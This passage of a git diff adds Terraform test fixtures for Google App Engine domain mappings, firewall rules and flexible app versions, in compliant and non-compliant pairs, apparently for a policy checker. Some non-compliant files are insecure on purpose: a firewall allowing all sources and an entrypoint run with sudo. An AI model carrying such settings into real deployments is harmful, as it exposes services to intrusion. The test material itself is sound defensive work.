"zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/c.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/c.tf new file mode 100644 index 000000000..a8ecef3b2 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/c.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_domain_mapping" "c" { + project = "gcp-project-12345" + domain_name = "verified-domain.com" + + ssl_settings { + ssl_management_type = "AUTOMATIC" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/config.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/nc.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/nc.tf new file mode 100644 index 000000000..53e739ce9 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/nc.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_domain_mapping" "nc" { + project = "gcp-project-12345" + domain_name = "unverified-domain.com" + + ssl_settings { + ssl_management_type = "MANUAL" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/plan.json b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/plan.json new file mode 100644 index 000000000..e2f753822 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/action/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_firewall_rule/action/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/action/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/action/c.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/action/c.tf new file mode 100644 index 000000000..d14450a1d --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/action/c.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_firewall_rule" "c" { + project = "gcp-project-12345" + priority = 1000 + action = "ALLOW" + source_range = "0.0.0.0/0" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/action/config.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/action/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/action/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/action/nc.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/action/nc.tf new file mode 100644 index 000000000..875639f5b --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/action/nc.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_firewall_rule" "nc" { + project = "gcp-project-12345" + priority = 1000 + action = "DENY" + source_range = "0.0.0.0/0" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/action/plan.json b/inputs/gcp/app_engine/app_engine_firewall_rule/action/plan.json new file mode 100644 index 000000000..ecb12c08f Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_firewall_rule/action/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/priority/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/priority/c.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/c.tf new file mode 100644 index 000000000..52e3e2925 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/c.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_firewall_rule" "c" { + project = "gcp-project-12345" + priority = 1000 + action = "ALLOW" + source_range = "*" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/priority/config.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/priority/nc.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/nc.tf new file mode 100644 index 000000000..ce381326a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/nc.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_firewall_rule" "nc" { + project = "gcp-project-12345" + priority = 2147483647 + action = "ALLOW" + source_range = "*" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/priority/plan.json b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/plan.json new file mode 100644 index 000000000..d45a33ac5 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/c.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/c.tf new file mode 100644 index 000000000..c9bded9ec --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/c.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_firewall_rule" "c" { + project = "ae-project" + priority = 1001 + action = "ALLOW" + source_range = "192.168.1.0/24" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/config.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/nc.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/nc.tf new file mode 100644 index 000000000..dcdc319aa --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/nc.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_firewall_rule" "nc" { + project = "ae-project" + priority = 1000 + action = "ALLOW" + source_range = "*" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/plan.json b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/plan.json new file mode 100644 index 000000000..153eb74cd Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/c.tf new file mode 100644 index 000000000..19fee63c6 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/c.tf @@ -0,0 +1,37 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "appeng-flex" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + resources { + cpu = 1 + memory_gb = 4 + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/nc.tf new file mode 100644 index 000000000..fa1f8b1a2 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/nc.tf @@ -0,0 +1,37 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "appeng-flex" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.9 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + resources { + cpu = 1 + memory_gb = 4 + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/plan.json new file mode 100644 index 000000000..99b9428f3 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/c.tf new file mode 100644 index 000000000..87356936f --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/c.tf @@ -0,0 +1,37 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/hardhat-bucket/hello-world.zip" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + resources { + cpu = 1 + memory_gb = 4 + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/nc.tf new file mode 100644 index 000000000..8c0bae7de --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/nc.tf @@ -0,0 +1,37 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "invalid.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + resources { + cpu = 1 + memory_gb = 4 + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/plan.json new file mode 100644 index 000000000..4258a1cf9 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/c.tf new file mode 100644 index 000000000..54888810b --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/c.tf @@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/nc.tf new file mode 100644 index 000000000..c094514b3 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/nc.tf @@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1-bad" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "sudo node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/plan.json new file mode 100644 index 000000000..fe7b377c1 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/.terraform.lock.hcl new file mode 100644 index 000000000..316309c9a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.17.0" + hashes = [ + "h1:VPHRMsm3eQrxzk1b7eHuSG9sG7315ZaGPshFjqzZ5No=", + "zh:103778d776fb994a6b24d70fa095c23a1672361f2a05d882b227b02507b402fc", + "zh:34bcd6cce3081a21983ccfad5cbf2cbf69ff298c65c6570edb4ec7d38a8183f5", + "zh:5f8fd0e8e40068b597b28c0bc08372c9228aad77746068101c72acf4bb902937", + "zh:6b25cee7dec78470feb987438aedb1f4354c696f6548edee7775621e8df24fa9", + "zh:6b5bd97884b51b86fa6a9f1905c0ebf695539e905122052896e8b05122416ff4", + "zh:86e634c5825d8bd32592ae6b74f15e1db5d9b61c85d1a2e529d1696effb76d54", + "zh:c3190609f6f638f4efd7359a5638eeff81d41a38a00861f7df870b5c8f4c11cb", + "zh:d42d854642b4d3b010f232d848197945f90af60e7f9883ac96d7caae9c9d2474", + "zh:da9929be5d3873ad317e488e7ada08d5b95b5461b34d91cef76314317bdc0d49", + "zh:ed2763c21b2f3c1eb7b4b92f6502069a24078345e19c88f91d9e3a46a17147f8", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + "zh:fbca63b82bbdef6fd329d2c8356b3f39f8c785ad93fd0596cfff676dbaef23ac", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/c.tf new file mode 100644 index 000000000..805be137a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/c.tf @@ -0,0 +1,33 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + failure_threshold = 4 + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/nc.tf new file mode 100644 index 000000000..7a155b865 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/nc.tf @@ -0,0 +1,33 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + failure_threshold = 0 + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/plan.json new file mode 100644 index 000000000..842ca7d14 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ 